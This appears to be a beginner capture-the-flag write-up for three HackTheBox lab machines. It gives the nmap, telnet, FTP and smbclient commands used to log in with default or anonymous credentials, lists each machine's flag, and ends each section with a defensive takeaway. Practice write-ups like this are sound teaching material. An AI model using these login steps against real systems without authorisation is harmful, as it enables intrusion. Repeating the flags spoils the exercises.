← Back to Write-ups Easy

HackTheBox: Starting Point — Meow, Fawn, and Dancing

HackTheBox Sep 15, 2024 by Rishabh Yadav
telnetftpsmbfundamentals

Overview

The HackTheBox Starting Point track is designed for absolute beginners. These three machines — Meow, Fawn, and Dancing — teach fundamental enumeration and service exploitation techniques that form the backbone of penetration testing.

Meow — Telnet

Recon

1

nmap -sV 10.129.x.x

Found port 23 (Telnet) open. Telnet is an unencrypted remote login protocol.

Exploitation

Connected via Telnet and tried common default credentials:

1

telnet 10.129.x.x

Logged in as root with an empty password — a classic misconfiguration.

Flag: b40abdfe23665f766f9c61ecba8a4c19

Takeaway

Telnet transmits everything in cleartext, including credentials. It should never be used in production — SSH is the secure alternative.

Fawn — FTP

Recon

1

nmap -sC -sV 10.129.x.x

Found port 21 (FTP) open with anonymous login enabled.

Exploitation

1
2
3
4
5
6

ftp 10.129.x.x
# Username: anonymous
# Password: (blank)
ls
get flag.txt
cat flag.txt

Flag: 035db21c881520061c53e0536e44f815

Takeaway

Anonymous FTP access is a common misconfiguration. Always disable anonymous access and enforce strong authentication on FTP servers.

Dancing — SMB

Recon

1

nmap -sV 10.129.x.x

Found port 445 (SMB) open. Listed available shares:

1

smbclient -L 10.129.x.x -N

Shares found: ADMIN$, C$, IPC$, and WorkShares (accessible without authentication).

Exploitation

1
2
3
4

smbclient //10.129.x.x/WorkShares -N
cd James.P
get flag.txt
cat flag.txt

Flag: 5f61c10dffbc77a704d76016a22f1664

Takeaway

SMB shares should require authentication. Never expose shares with sensitive data to unauthenticated users. Use access control lists and network segmentation to limit exposure.

Flags

  1. Meow: b40abdfe23665f766f9c61ecba8a4c19
  2. Fawn: 035db21c881520061c53e0536e44f815
  3. Dancing: 5f61c10dffbc77a704d76016a22f1664